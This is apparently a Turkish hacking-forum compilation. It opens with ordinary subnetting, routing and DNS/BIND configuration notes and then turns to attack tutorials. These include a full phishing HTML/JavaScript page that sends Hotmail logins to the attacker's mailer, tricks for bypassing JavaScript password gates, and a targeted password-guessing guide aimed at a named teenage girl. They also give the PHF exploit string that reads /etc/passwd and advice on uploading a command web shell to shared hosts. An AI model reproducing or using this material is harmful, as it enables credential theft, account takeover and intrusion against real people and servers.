Alt-Ağ Sayısı A Grubu Subnet Mask B Grubu Subnet Mask C Grubu Subnet Mask
2 255.128.0.0 255.255.128.0 255.255.255.128
4 255.192.0.0 255.255.192.0 255.255.255.192
8 255.224.0.0 255.255.224.0 255.255.255.224
255.240.0.0 255.255.240.0 255.255.255.240
32 255.248.0.0 255.255.248.0 255.255.255.248
64 255.252.0.0 255.255.252.0 255.255.255.252
Bu tablo ya göre 192.168.1.0 C grubu ağ adresini 4’e bölersek şu sonucu elde ederiz:
Ağ Numarası Ağ Adresi Yayın (Broadcast) Adresi Alt Ağ Maskesi
1 192.168.1.0 192.168.1.63 255.255.255.192
2 192.168.1.64 192.168.1.127 255.255.255.192
3 192.168.1.128 192.168.1.191 255.255.255.192
4 192.168.1.192 192.168.1.255 255.255.255.192
Router (Yönlendirici): Networkler arası haberleşmenin yapılabilmesi için ara bağlantıyı sağlayacak cihazlara router denir. Routerin bir işlemcisi, epromu ve üzerinde bir işletim sistemi IOS (Internal Operating System) vardır.
Routerlar IP paketlerinin yönlendirilmesinden sorumludur ve bu yüzden üzerlerinde routing tabloları tanımlanmıştır. Routing tabloları iki çeşittir: Statik ve dinamik.
Aşağıda şekli gözüken ağ için statik routing tabloları şöyledir:
Statik Routing - Router A
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 192.168.1.1 192.168.1.1
192.168.2.0 255.255.255.0 10.0.1.1 10.1.1.2
192.168.3.0 255.255.255.0 10.0.1.1 10.0.2.2
Statik Routing - Router B
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 10.0.1.2 10.0.1.1
192.168.2.0 255.255.255.0 192.168.2.1 192.168.2.1
192.168.3.0 255.255.255.0 10.0.2.1 10.0.2.2
Dinamik routing tablolarında ise tabloya yanlızca router’ın direk olarak bağlı olduğu ağ adresleri eklenerek, RIP protokolü ile tabloların routerlar arasında paylaşılması sağlanır.
Dinamik Routing - Router A - Başlangıç
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 192.168.1.1 192.168.1.1
192.168.2.0 255.255.255.0 10.0.1.1 10.0.1.2
Dinamik Routing - Router B - Başlangıç
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 192.168.1.2 192.168.1.1
192.168.2.0 255.255.255.0 192.168.2.1 192.168.2.1
192.168.3.0 255.255.255.0 10.0.2.1 10.0.2.2
Dinamik Routing - Router A - RIP sonrası
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 192.168.1.1 192.168.1.1
192.168.2.0 255.255.255.0 10.0.1.1 10.0.1.2
192.168.3.0 255.255.255.0 10.0.1.1 10.0.2.2
Dinamik Routing - Router B - RIP sonrası
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 10.0.1.2 10.0.1.1
192.168.2.0 255.255.255.0 192.168.2.1 192.168.2.1
192.168.3.0 255.255.255.0 10.0.2.1 10.0.2.2
DOMAIN NAME SYSTEM-
HostnameIP adresleri 32-bit olduğu için 212.29.89.3 gibi bir ip yerine, hostname mayasistem yazmak daha kolaydır.Hostnameler ip numarasına dönüştürülürler.-Domain adları ve subdomainlerHost yada domain adlarının tanımlanmasında kullanılır.Organizasyon ve coğrafi yapıya gore top level domain’ lere ayrılırlar. Ör: com, edu, org, gov, tr, de vb.Subdomain’ ler domain hiyerarşinini belirtir.Ör: vestelnet.net.trDomainsubdomain adları birer network numarasına dönüştürülebilirler Domain Name SistemiHostname’ in tam hali domain ve subdomain’ i içerir. Ör: , vestelnet.net.trBu adlandırma avantajı ilgili IP numarası değişikliklerinden izole edilir.DNS server’ lar (DNSS)Keyfi seçilmiş bir adres çözümlemesi için hostlar DNSS’ le hemen bağlantı kurar ve hiyerarşide yer alan diğer DNSS’ lerde doğru karşılığı bulunana kadar route işlemi gerçekleşir.Arada bulunan DNSS cache’ lerin yardımıyla kayıtlar daha kısa sürede bulunabilir.DNNS’ ler aralarında UDP ile haberleşirler, sebebi ise daha hız!
lı iletişim kurabilmektir.DNS Iletişim örneğialamut.cmpe.boun.edu.tr adresini çözmek için DNSS’ lere cmpe ya da boun domainleri için bağlantı kurar. Bu istek tr DNSS’ e, daha sonra US’ deki top level domain DNSS’ lere, oradan da de DNSS (kayıt orada olduğu için) route edilir ve oradan boun DNSS ve palamut.cmpe.boun.edu.tr’ a geri dönüş olur.DNS özellikleriSistem esas alınarak domain adına dayalı database hiyerarşik bir yapıya sahiptir.Milyonlarca host bilgisini organize eden domain clusterı çok iyi bir şekilde dengelemelidir.Yeni hostların bilgisi networkte hiyerarşik bir şekilde dağılır.Berkeley Internet Domain Name (BIND)Client konfigürasyonuServer Konfigürasyonunslookup programıNetwork Information Service (NIS) YazılımıClient KonfigürasyonuServer Konfigürasyonu BIND softwareDNS Unix sistemi üzerinde çalışır.Clientserver yazılımı mevcuttur.Resolver : ad sorgulaması yapan client’ tır, ilgili isme karşılık gelen ip no. nedir diye sorar.Named : ad sorgulama !
işlemlerine cevap veren server’ dır.BIND yazılımındaki olabile!
cek konfigürasyonlar özellikleriadece soru soranCevapları aklında tutanPrimary ( master ) Secondary ( slave ) : milyonlarca name dolaşıyor ama tek başına yeterli değil, primary’ ye soran .Resolver KonfigürasyonuResolver ayrı bir proses olmamakla beraber, network prosesi için gerekli bilgileri içeren bir kütüphane görevi görür. Gelen istekleri once kendisinde arar, bulamazsa diğer makina ile bağlantı kurar.resolve.conf komutu kullanılarak ya da default konfigürasyon kullanılarak kullanılabilir.Default Resolver KonfigürasyonuDefault name server olarak local host’ u kullanır.hostname komutu kullanılarak domain name kayıdı çıkarılır.Resolver konfigürasyon dosyası: /etc/reslv.confLocal system named yapılmamışsa kullanılır.Domain adı once serverdan çözümlenmeye çalışılır, eğer bulamazsa client’ a yönelir./etc/resolv.conf komutunda yapılabilecek kayıtlar:-nameserver adresdosyada bulunan serverlar ad sırasına göre kaydediliren çok bağlanılan domainler maksimum 3 server kullanılara!
k kayıtlar yenilenir.-domain adıresolv.conf dosyası:
domain cc.vestelnet.net.tr
#try yourself firstnameserver 127.0.0.1
#try ns1.vestelnet.net.tr nextnameserver 212.29.65.250
#finally try ns2.vestelnet.net.trnameserver 212.29.65.240
named konfigürasyonuGereken dosyalar:- named.boot (directory)- named.ca (cache)- named.local (numaraya karşılık gelen isim bulunuyor)- named.rev- named.hostsnamed.boot dosyası Komut FonksiyonuDirectory Sonradan yaratılan directory’ leri bulurPrimary Server’ ı primary olarak algılarSecondary Server’ ı secondary olarak algılar Cache Cache file’ nı gösterirForwarders Bulunamayan isimlerin forward edildiği serverları listelerSlave Forwardlar için kullanılan serverların slave olarak çalışmasını sağlarÖrnek: sadece cache işlemi yapan serverın konfigürasyonunda named.boot kullanımıPrimary 0.0.127.IN-ADDR.ARPA /etc/named.localCache. /etc/named.caÖrnek: primary server konfigürasyonunda named.boot komutunun kullanımı; vestelnet.net.tr primary server boot filedirectory /etcsecondary ns2.vestelnet.net.tr 212.29.65.240 primary ns1.vestelnetnet.tr 212.29.65.250 cache .BIND için standart kaynak kayıtlarıKaynak Kayıt, tekst adı Kayıt FonksiyonuStart of Authority SOA Zone girişini etkiyen pa!
rametreleri belirtirName Server NS Domain adı server’ın adını belirtirAddress A Host name’ I adrese çevirirPointer PTR Adresi hostname’ e çevirirMail Exchange MX Domain adına gönderilen mailin ulaşacağı yerdir CNAME alias hostname belirlerHost information HINFO OS ve host’ un hardware’ ini açıklarWell Known Service WKS Network servisini duyururDNS kaynak kayıtlarının formatı[name] [time-to-live (sec)] IN type dataEski kullanılmamış kayıtları unutup, yenilerine yer açmak için kullanılır.Örnek: named.ca dosyası; root domain için serverlar.
99999999 IN NS arabul.veezy.com.tr
99999999 IN NS bulmaca.gen.tr
99999999 IN NS veezygo.com.tr;
Root servers by addressarabul.veezy.com.tr
99999999 IN A 212.29.65.100bulmaca.gen.tr
99999999 IN A 212.29.65.101veezygo.com.tr
99999999 IN A 212 .29.65.102A:
adresÖrnek: named.local dosyası; named.local 127.0.0.1 adresini local host’ a çevirmek için@ IN SOA ns1vestelnet.net.tr.rahsan.vestelnet.net.tr.(1 ;serial36000 ;her 100 saatte bir yenilenme3600 ;1 saatten sonar tekrar deneme3600000 ;1000 saatten sonar kayıdı sil (expire ol)36000 ;default ttl = 100 saat) IN NS ns1.vestelnet.net.tr1 IN PTR localhost Örnek:named.rev dosyasıVeezygo.com.tr domain için;IP’ nin host name’ e dönüşümünde kullanılır.@ IN SOA ns1vestelnet.net.tr.rahsan.vestelnet.net.tr.( 10099 ;serial 43200 ;refresh3600 ;retry3600000 ;expire2592000 ;minimum) IN NS ns1.vestelnet.net.tr IN NS ns2.vestelnet.net.tr68.192 IN PTR ns1.vestelnet.net.tr69.192 IN PTR ns2.vestelnet.net.trÖrnek: named.hosts dosyası;; adres ve host bilgisi yazılır;@IN SOA ns1.vestelnet.net.tr.rahsan.vestelnet.net.tr.( 10118 ;serial 36000 ;her 100 saatte bir yenile 3600 ;1 saatten sonar yenile 3600000 ;1000 saatten sonar kayıdı sil (expire ol) 36000 ;default ttl = 100 saat );name ve mail server’i be!
lirtir. IN NS ns1.vestelnet.net.tr IN NS ns2.vestelnet.net.tr IN MX mail.vestelnet.com;;localhost belirlemelocalhost IN A 127.0.0.1;zone belirtmens1 IN A 212.29.65.250ns2 IN CNAME ns2.vestelnet.net.tr IN MX mail.vestelnet.com;Host tablosunda gateway ve host girişleri bulunurnetlab-gw IN A 212.29.65.1; sub domainler belirtilircmpe IN NS vestelnet.net.trnamed.boot tanımlamsı yapıldıktan sonar, named’ in başlangıcı:#namedhata logları /usr/adm/messagesnamed çalışıyor, nslookup ile kayıtların doğruluğunu kontrol için kullanılıyor. Örnek:% nslookup server: ns1.vestelnet.net.tr address: 212.29.65.250 name: address:212.29.65.205named konfigürasyon kopyalarının oluşturulmasında izlenecek en kolay yolvarolan dosyanın kopyalanarak yeni dosyanın oluşturulmasıdır.
HOTMAIL HACK
Selamlar. Bu bölümde hotmail mail hesaplarını hack eden bir html scriptini inceleyeceğiz. Scriptin tamamı sayfanın sonunda bulacaksınız. Bu exploitin işleyiişi çok basit. Adamın hotmail adresine bir mail yolluyorsunuz. İçinde bu scriptin olduğu bir htm dosyası bulunuyor. Adam htm dosyasını açar açmaz tüm user name ve passwordları sizin belirlediğiniz mail adresine yollanıyor.
Şimdi adım adım işlemleri yapalım....
Adım 1: Önce kurban seçin.Hotmailden bir mail hesabı açın.
Adım 2: ********* ten bir mail adresi alın ben burda phyton olarak seçtim. olan bir mail adresi almış oldum. Web alanı sizi ilgilendirmiyor bu işlemde...
Adım 3: Aşağıdaki scriptteki 17 satırda bulunan satırda yapmanız gereken değişiklik var. <body onload="********.body.innerHTML=’<iframe scrolling=no frameborder=0 width=100% height=100% src=http://www.forumzone.it/index.htm></iframe>’;"> Şu an phyton hesabına göre "<FORM METHOD=POST ACTION=\"http://www.*********.com/cgi-bin/homestead/mail.pl?phyton\" target=\"_top\">" + bu şekilde gözüküyor. burada phyton yazan yere kendi ********* mail hesabınızı yazın. Adamın hotmail hesabı buraya yollanacak. Scriptte hemen altta...
-----------------------------------------------
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
********>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We’re Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.*********.com/cgi-bin/homestead/mail.pl?phyton\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail’s Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}
nomenulinks=top.submenu.********.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.********.links.target="work";
top.submenu.********.links.href= "javascript:getmess()";
}
noworklinks=top.work.********.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.********.links.target="work";
top.work.********.links.href= "javascript:getmess()";
}
</script>
</body>
</html>
-----------------------------------------------
Adım 4: Şimdi bir mesaj hazırlayın. İçine bu scripti yzdığınız html dosyasını yerleştirip yollayın.
Adım 5: Kurban bu maili kontrol edip html açar açmaz user ve pass ********* hesabınıza gelecektir.
Iyi hackler..
JAVA SCRIPT PASSWORD CRACK
Bazı sitelerde görürsünüz, "Bu bölüme girmek için şifre gerekir. Şifreyi sponsorumu ziyaret ederek alabilirsiniz" şeklinde mesajlar ve şifre isteyen pencereler çıkar. İşte biz bu yazıda bunlarda kurtulmanın yollarına göz atacağız. Elimde bulunan java-script şifreleme algoritmaları hakkında bilgi vereceğim. Aynı zamanda bunları debug etmeyi gösterecem. Bu sayede kolayca sizde istediğiniz sayfanın okdunu kıracaksınız. Tabi bunu kötü amaçlardan çok, sponsoruna tıklamanız konusunda ısrarcı olan kişiler üzerinde kullanın. Şimdi adım adım görelim;
1) Öncelikle bu tip passworları kırabilmek için sayfa kaynak koduna sahip olmanız gerek. Çoğunlukla bu sayfaların kaynak kodunu görmek imkansızdır. Çünkü sayfanın üzerine sağ tıklama şansınız yok. Bunu aşmak için önce butona tıkladığımızda hangi sayfaya gittiğini bulalım. Sitenin an sayfasında bir buton var. Buna tıklayın ve şifrenizi girin yazıyor. Burada yapacağımız sayfanın kaynak koduna bakamak ve buraya tıkladığımızda gideceğimiz sayfanın adını bulmak. Diyelimki şöyle bir satır bulduk.... <a href= "Gizli/index2.html" ..........
2) Şimdi bu sayfayı almamız gerek. Bunun için Getright çok uygun. Sitemizin adresi www.salak.com olsun. Bu sayfayı almak için getrightte Enter New URL girip yazıyoruz. Getright bunu bize indiriyor artık kodu trace etmekten başka bir şey kalmıyor.
Java Script TRACE;
Aşağıda bazı password scriptlerinin trace edilmesini göreceksiniz. Bu bir bakıma debug ama bir şey çalıştırma olayı yok tabiki.
1) Bu script oldukça sık kullanılıyor. Ekrana bir pop-up penceresi getiriyor. Böylece sayfanın kaynak kodunu görmek imkansızlaşıyor. Ama az önceki yöntemle alınabilir. Kod şöyle.
********************************
******** language="JavaScript">
<!--
var password = prompt("Burası sitenin özel bölümüdür lütfen passwordunuzu girin. \(It’s ’please’\)") gelen mesaj....
if (password == "FUCKOFF") { // Buradan Passwordu kolayca alıyoruz.
alert("Tesekkürler, \n \n Sifreniz dogru,girebilirsiniz.") // Şifremiz Doğruysa Çıkan mesaj
******** = "porn.htm" Doğru ise Gideceğimiz Adres
}
else {
******** = "../index1.htm" Yanlışsa Gidilecek Adres
}
// -->
</script>
******************************
2) Bu java script ise çok hoş özelliğe sahip. Ekrana bir keypad getiriyor. Sanki bir kapıyı açmak ister gibi şifre giriyoruz. Örneği ve kodu aşağıda,
Please enter the code 1234 to find out how this is done.
Kod; (Kodda keypadin bulunduğu bölüm kesilmiştir. Kodun açıklamasına gelince kodun yaptığı işlem bizim girdiğimiz rakamları bir biri ile çarpıp çıkan sonuç doğru ise rakamlardan oluşan adrese gitmek. Yani yukardaki örnekte 1234 girince script 1*2*3*4 olarak algılıyor. Çıkan sonucu 24 ile karşılaştırıyor. Eğer doğru ise 1234.html adresine gidiyor.
******** language="JavaScript">
var usermulcode=24 çarpımının kaç edeceği
var code=0
var mul=1
var digit=0
var fails=0
function Enter_code(number)
{
code=code*10+number rakam ekliyor
mul=mul*number u her rakam girişinde güncelliyor
********.codepad.thecode.value=code ekranda gözükmesini sağlıyor
digit++ ekler
if (digit==4) rakamlı şifre olacağı
{
if (mul==24) (yani çarpımın çıkacağı sonuç) 24 olursa,
{
********=code+".html" sonuna .html ekle ve o sayfaya git.
}
else
{
fails++
code=0
mul=1
digit=0
if (fails<3)
{
if (fails==1) // Şifre yanlışsa ekrana gelen mesaj.
{********.codepad.thecode.value="Try again"}
if (fails==2)
{********.codepad.thecode.value="Last time"}
}
else
{
********="index.html" yanlışsa gidilecek yer
********.codepad.thecode.value="Bye!" yanlışsa çıkacak mesaj
}
}
}
}
function keycodepad(mulcode)
......
</SCRIPT>
Burada yapılacak şey önce hangi rakama eşitlememiz gerektiği. Bunu bulunca bu sefer kaç rakamlı olacağı. Şimde elimizdekilere göre hemen olasılıkları deniyoruz. Zaten fazla bir olasılık olamayacağı için bulmakta pek zorlanmazsınız...
3) Şimdiki Javascript ise oldukça zorlayıcı bir script. Şimdilik en güvenli scriptlerden biri olarak gözüküyor. Çünkü kod hiç bir açık verimiyor. Siz user name yazıyorsunuz örneğin, "Phyton" (Büyük Küçük Harf Önemli). Şifre giriyorsunuz "4562" Script Phyton4562.html diye bir sayfa arıyor. Eğer varsa o sayfaya gidiyorsunuz. Şayet yoksa öyle bir sayfa olmadığı için klasik Browser sayfa bulunamadı hatası olan 404 PAGE NOT FOUND yazısına akraba oluyorsunuz.....
Sadece Scriptin Kodu;
******************************
<!--start stealth
function Getstats() {
window.status=(’Attempting to Login to user area.’)
var AccId;
var iName;
AccId = ********.iAccInput.iAccID.value --> Password değeri için değişken atanıyor (AccID)
iName = ********.iAccInput.iName.value --> User Name İçin değişken atanıyor.
if (AccId == "" || iName == "") --> Eğer password veya isim boşsa Aşağıdaki Hata mesajını çıkarıyor.
{
alert(’\nERROR\n\n\nYou must enter ALL Details,\nto View your statistics.\n’);
window.status=(’Missing data or Invalid. Check spelling and Ensure Names are in Correct Case.’)
}
else
{
var ********=("pw" + iName + AccId + ".html"); -->Bu satırda ise önce pw sonra username sonra pasword sonrada .html yazılıyor. Böylece "pwphyton55467.html" gibi bir sayfa oluyor.
this.********.href = ********; --> Böyle bir sayfa olup olmadığı kontrol ediliyor. Ve bu sayfaya gidiliyor.
window.status=(’ Verifying: ’ + iName + ’-’ + AccId + ’ Please wait........’);
}
}
// end hiding -->
*****************************************
Login
User Name:
Password:
[Login]
(You will need your account ID number & User name)
[ CASE SENSITIVE ]
Try
USERNAME: LetMeIn
PASSWORD: 254662
4) Bu scripti ise bir adult sitede gördüm. Hani olur ya sizde sponsorunun sayfasına gitmenizi oradan bir kelimeyi password olarak yazmanızı ister. İşte o tip bir script idi. Aşağıda görünüşü ve kaynak kodunu nasıl izliyeceğimiz var.
Tr *** sitesinden alınmıştır. (Gerçi site diğerlerinden daha iyi. Çünkü bir kere sponsor var..)
ENTERANCE
GIRIS
Username:
Password:
******** LANGUAGE="JavaScript">
<!-- Begin
function Login(){
var done=0;
var username=********.login.username.value; --> Kullanıcı adı için değişken atanıyor.
username=username.toLowerCase(); --> Değişkenin küçük harfle olması sağlanıyor
var password=********.login.password.value; --> Şifre için değişken atanıyor
password=password.toLowerCase(); --> Değişkenin küçük harfle olması sağlanıyor
if (username=="trsex" && password=="streaming") {
window.********="dexin123.htm"; done=1; } --> username ve şifre trsex ve streaming ise dexin123.htm adresine gidiyor.
if (username=="member2" && password=="password2") { window.********="http://www.javafile.com/javascripts/browsers/pass3.htm"; done=1; } -->Örnek Login Passwordleri ...
if (username=="member3" && password=="password3") { window.********="http://www.javafile.com/javascripts/browsers/pass3.htm"; done=1; } --> Örnek Login Passwordleri ..
if (done==0) { alert("Invalid login!"); } --> Eğer yukardaki şifre ve usernamelerde hiçbiri ile tutmazsa bizim yazdığımız Popup ile invalid Login yazısı geliyor.
}
// End -->
</script>
5) Advanced Password Script: Bu da hem username hemde şifrenizi bir popup menü ile kontrol ediyor. Popup menü olduğu için getright kullanarak kaynak sayfayı indireceğiz ve ondan sonra kodu trace edeceğiz.Kodu aşağıda olan scripti incelerseniz şifre ve kullanıcı adının yan yana yazıldığını ve ayrı ayrı göremediğimizi fark etmişsinizdir. İkisininde rakam olma durumunda çözmemizde çok zor olur. Ama scriptin açığı en üst satırda goodURL değişkenine atanan sayfa adresi. Browserimize bu adresi yazıyoruz ve BİNGO işte bu kadar.
******** language="Javascript">
<!--
var goodURL = "advpassword2.html" --> Eğer şifremiz doğruysa gideceğimiz adres.
alert("To access the following ********, you must pass a " --> Burada şifreli bir alana gireceğimiz haber veriliyor.
+"members-only, authorization test.\n \n At the appropriate "
Bir siteyi, maili yada başka şifre isteyen bir yeri kırmak istediğimizde aklımıza sınırlı sayıda çare gelir. Bunlardan biride Dictionary (sözlük) Attack dediğimiz yöntemdir.
Bu yöntemle sırayla önceden şeçilmiş bazı şifreler sistemde denenir ve şifre aşılmaya çalışılır.
Şimdi diyelim ki 17 (21-05-1990) yaşında olan melis adında birinin Hotmailini kıracağız. Bu şahsı az buçuk tanıyoruz. Mesela aynı apartmanda oturuyoruz, ne kadar bu işlerden çaktığınıda biliyorsunuz. O zaman başalyalım. Bu kızın soyadı Taş olsun yani Melis Taş. Cep telefonuda 0 535 *** ** ** olsun.
Bu kızın en basitinden şifresini bir 1990 koymak ister sonra olamdı der 19901990 koymak ister o da olmadı 2105984 koymak ister. Bunlarla doğum tarihine göre kombinasyonlar yapabiliriz. Daha çok seçenek var. Bu kızın şifresi 0535 *** ** ** olabilir. Yada *** ** ** olabilir.
Şifre TaşMelis olabilir MelisTaş olabilir, kedisinin adı pamuk olsun, pamukmelis olabilir. melsipamuk olabilir. yada arsenal li olsun olsun o zaman arsenal1990 olabilir. melisarsenal olabilir. melisarsenalpamuk olabilir. Yada ev telefonuda olabilir.
Diyelim ki gizli sorusunu bulucaz. Soru yanlızca "kola" diye bir kelime. O zaman onun cevabı yukardakinin aynısı yani "kola" olabilir. Yada sanane, bilmiyorum gibi sözcükler olabilir.
Yada şifre yedi tane 7 , üç tane 3 de olabilir. 54321 olabileceği gibi 123456789 da olabilir. 0000 da olabilir 9876543210 da olabilir.
Oturduğu apartman, şehir, sokak isimleride kullanılır. Annesinin kızlık soyadı. Yada okul numarası. Sonuçta kişi unutmamak için herkesin bildiği ve kullanılan bazı numaralardan ve isimlerden bir kombinasyon yapmak isteycektir. Bizim burda yapmamaız gereken burda bu kişiye göre yapılabilecek kombinasyonları tahmin edip bir sözlük hazırla*****. Dict. attack yapmak olacaktır. Baya uzun süren bir iş olabilir ama bu tarz şifreler kullanan biriyse kesin düşer tuzağa.
Yada rakamlardan 98745632210 olabilir. Bu sizin düşünce kabiliyetinize bağlı daha çok üretebilirsiniz.
Bu tarz klavye oyunlarıyla hazırlanmış, ayrıca kişiye özel olarakta hazırlanmış bir sözlüğün; sanıyorum ki başakalarının şifrelerini bulmakta büyük yararı olur, ki oluyor zaten.
Bazen şahıslar en sevdikleri hayvanı, eşyayı, şarkıcıyı, futbolcuyu falanda yazarlar.
Demek ki şahsi olan biligilere ve klavye oyunlarına dikkat etmemiz gerekiyormuş. Önemli olan kişi için kolay hatırlanabilecek bir şey yazmak. Herkes şifrelerini bu mantıkla bulur. Eminimki bu yazıyı okuyanlardan, yani sizlerden birileri de burda kendi şifresinin formülünüde görmüştür Dedim ya herkes bu tarz şeyler kullanıyor. Ama bilmiyor ki bu yöntemleri bazıları zaten biliyor.
Her zaman şifrenizi anlamsız ama sizin ezberlediğiniz küçüklü büyüklü harfler ve rakamlardan oluşan en az 8 haneli kombinasyonlardan seçin ve hiçbir yere yazmayın! Yazarsanızda kimsenin ne olduğunu anlayamayıcağı şekilde farklı bir yerlere yazın.
Bunca seneye kadar ben, aslında hiçbir makinayı yada sistemi hack etmedim! Şu güne kadar hep o sistemin arkasında bulunan insan mantığını aştım. Bu benim için daha kolaydı. Çünkü sistemler değişiyor, yamanıyor ama insan mantığı milyonlarca yıldır aynı. Bunun örneğini SchoolBus TR nin FireWalları aşma sisteminde görebilirsiniz...
Şimdi web hacking olayı Hack olayının en akıl isteyen kısmıdır. Şimdiden söylüyorum aranızda bu işlerden anlamayan veya kafası bu tarz işlere basmayanlar varsa bu yazıyı okuyupta vaktini boşa harcamasın. Bu işlerde yeteniği olan kişiler yanlızca web hacking yapabilir. Gerisi avcunu yalar.
Olaya giriyorum. Şimdi en önce olayı mantık ve felsefe sınırlarına oturtalım. Bu benim kendi felsefem. Felsefem ise şu: Bir sistemin nasıl çalıştığını bilmeden, o sistemi kıramazsın! Bunu bir diğer anlamda açıklarsak bir sistemin arkasını görmeden onu önden çökertemezsin.
Peki ne bu? mesela senin bir web siten yok! Ama web hacking yapmak istiyorsun mümkün mü? Hayır değil! Nasıl işlediğini bilmediğin birşeye zarar veremezsin.
Peki yöntemler neler. Herkezin yapacağı basit yöntemler var başta. Mesela Brute Force, Dict Attack falan. Bunları yapmak için nerdeyse web bilmeye bile gerek yok. Sadece FTP bil yeter. Tabii bunlar Lamerlara göre şeyler, biz olayı aştığımız için fazla bilgi isteyen şeyleri yapıcaz. En önce bir sisteme girmek için açık olması gerekli ki açıktan dalalım. Nasıl açıklar olabilir bunlar, mesela bir script açığı PHF gibi. PHF kullanan sitelere şunu yazarsak bize şifrelerin bulunduğu yer gözükür /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd . Ne bu? Açık tabii ki. Çoğu site yamamıştır şimdi ama bu bir açık. Nasıl bulunur? Script yazmayı bilenler bunu bulur. Kaynak koda bakarsın, açık olduğunu işleyiş tarzından anlarsın işte YOL! Burdan şifreleri alırsın bazılar Shadowed falan olur, bazılarını kırmak gerekir falan Cracker Jack tarzı programlarla kırarsın olur biter.
Şimdi bu bir yöntemdi ama başkalarıda var hatta hayal bile edilmemişleri var bu işlerde.
Mesela diğer bir yöntem, Commander.PL. şimdi diyeceksiniz ne bu? Bu commander.pl upload edildiği UNIX makinalara CHMOD 777 ve 755 sayesinde istediğiniz komutu girmenizi sağlayan birşey. Mesela benim hostingimi The-King sağlıyor ve site adı Hackerpower.com. Şimdi bana ayrılan subdomain olan spmaster a ben bunları upload edip çalıştırsam, ftp ile yetkimin olmadığı dosyalara ulaşır istediğimi silerim falan! Anladınız mı? Bakın ne kadar basit! Gidin bunu beleş yer veren yerlere yapın bakalım şimdi.
Diğer bir yöntem derim ama o kadar çokki. Zaten bu yazıyı okuyorsanız ya kendinizi geliştirmek istiyorsunuzdur yada bunu öğrenmek istiyorsunuzdur. Söyliyim şimdiden ikinci seçenektekiler için üzgünüm...
Şimdi benim bulduğum bir yöntem! Bunu açıklamıyacaktım çünkü sonuçta bahsediceğim şahıs benim sitemin bir ziyaretçisi. Ondan çok özür diliyorum bunu anlattığım için ama merak etmesin bu yazıyı okuyanların %99 u sana zarar verebilecek kadar bu işleri iyi bilmiyor. O yüzden sanıyorum sakıncası olmayacaktır.
Şimdi başlıyım, Panick bana jayjay diye bir dostunun olduğunu söyledi, bende baktım bize üye olmuş site kısmındada TYMSAH.COM yazıyor. Merak ettim siteye gittim. Bir baktım ki onlarda bizim formumumuz olan IKONBOARD un aynısını kullanıyor. Neyse baktım tymsah benim türkçeleştirmediği yerleri de türkçeleştirmiş forumun. Bende benim forumdan ve onun forumdan ona PM attım ve bu dosyaları istedim. Bana vereceğini söyledi, aradan vakit geçti dosyaları alamadım çünkü tymsah sanıyorum ki evinde değilmiş şehir dışındaymış.
Bende baktım olmuyor bekle bekle, Allah’a şükür bu işlerden anladığım için hemen yapmam gerekeni yaptım ve onun bana yollayacağı dosyaları kendim aldın nasıl mı?
Ben ikonboard’un dil dosyalarını falan nereye kurduğunu biliyorum. Yani tüm klasörlerin nerede ve hangi isimle olduğunu biliyorum. Çünkü bende ikonboard kullanıyorum. Bende madem öyle dedim, ve forumun dil dosyalarını indirmeye başladım yaptığım şu idi. Mesela hata mesajlarını bulunduran dil dosyasını istiyorsam yazmam yeterli. Dan diye ben bu dosyayı download edebiliyorum.
İşte ben böylece tüm dosyaları download ettim ve gördüm ki onun forum ile benim forum farklı versiyon olduğundan dosyalar uyuşmuyor
Herneyse ben istediğimi aldım ama iyi bir insan olarak. Peki diyelim ki ben kötü biriyim ve neler yaparım. İlk yapıcağım iş forumun DATABASE dosyasını ele geçirmek olacaktır. Bu sayede ben tüm forumdaki kullanıcılara şifrelere ve maillere ulaşabilirim. Bu kadar basit! Ha bu şifereler ENCRYPT edilmiş olacağından siz okuyamazsınız bunları. Bunu DECRYPT etmeniz gerekir. Tabii ben okurum bunları. Olay basit aklını kullanacaksın.
